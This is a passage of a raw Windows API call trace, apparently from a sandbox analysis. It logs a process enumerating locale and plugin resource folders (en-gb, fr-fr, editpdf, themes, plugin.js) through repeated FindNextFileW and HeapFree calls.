(in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.488] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-gb", cAlternateFileName="")) returned 1 [0176.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.488] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-il", cAlternateFileName="")) returned 1 [0176.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.488] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-es", cAlternateFileName="")) returned 1 [0176.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.488] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu-es", cAlternateFileName="")) returned 1 [0176.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.488] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-fi", cAlternateFileName="")) returned 1 [0176.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.488] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeb0dbd2, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeb0dbd2, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeb0dbd2, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0176.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.489] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-ma", cAlternateFileName="")) returned 1 [0176.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.489] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-il", cAlternateFileName="")) returned 1 [0176.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.489] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-hr", cAlternateFileName="")) returned 1 [0176.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.489] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-hu", cAlternateFileName="")) returned 1 [0176.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.489] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-it", cAlternateFileName="")) returned 1 [0176.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.489] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp", cAlternateFileName="")) returned 1 [0176.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.490] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-kr", cAlternateFileName="")) returned 1 [0176.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.490] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-no", cAlternateFileName="")) returned 1 [0176.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.490] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeb0dbd2, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeb0dbd2, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeb0dbd2, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-nl", cAlternateFileName="")) returned 1 [0176.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.490] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-pl", cAlternateFileName="")) returned 1 [0176.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.490] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-br", cAlternateFileName="")) returned 1 [0176.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.490] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-ro", cAlternateFileName="")) returned 1 [0176.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.491] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0176.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.491] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-ru", cAlternateFileName="")) returned 1 [0176.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.491] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-sk", cAlternateFileName="")) returned 1 [0176.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.491] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-si", cAlternateFileName="")) returned 1 [0176.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.491] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-sl", cAlternateFileName="")) returned 1 [0176.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.491] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-se", cAlternateFileName="")) returned 1 [0176.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.492] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-tr", cAlternateFileName="")) returned 1 [0176.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.492] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x4b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ui-strings.js", cAlternateFileName="UI-STR~1.JS")) returned 1 [0176.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.492] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeae796f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeae796f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeae796f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-cn", cAlternateFileName="")) returned 1 [0176.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.492] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 1 [0176.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.492] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 0 [0176.492] FindClose (in: hFindFile=0x727bc8 | out: hFindFile=0x727bc8) returned 1 [0176.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0176.493] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeeb0dbd2, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeb0dbd2, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeb0dbd2, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x2b4e3, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugin.js", cAlternateFileName="")) returned 1 [0176.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0176.493] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeac1720, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeeac1720, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeeac1720, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0176.493] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0176.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0176.495] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b7c046, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b7c046, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b7c046, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="editpdf", cAlternateFileName="")) returned 1 [0176.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0176.495] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b7c046, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b7c046, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1f5bdf7, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0176.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5151068 | out: hHeap=0x6a0000) returned 1 [0176.502] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f0f931, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1f0f931, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1f5bdf7, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dark", cAlternateFileName="")) returned 0 [0176.502] FindClose (in: hFindFile=0x7276c8 | out: hFindFile=0x7276c8) returned 1 [0176.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0176.502] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f0f931, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1f0f931, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1f0f931, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="themes", cAlternateFileName="")) returned 0 [0176.502] FindClose (in: hFindFile=0x727bc8 | out: hFindFile=0x727bc8) returned 1 [0176.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0176.503] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5bdf7, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1f5bdf7, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1f5bdf7, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0176.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.671] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x214bcc3, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x214bcc3, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x214bcc3, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca-es", cAlternateFileName="")) returned 1 [0176.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.673] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5bdf7, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1f5bdf7, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1f5bdf7, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-cz", cAlternateFileName="")) returned 1 [0176.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.673] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x214bcc3, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x214bcc3, ftLastAccessTime.dwHighDateTime=0x1d39f5e, 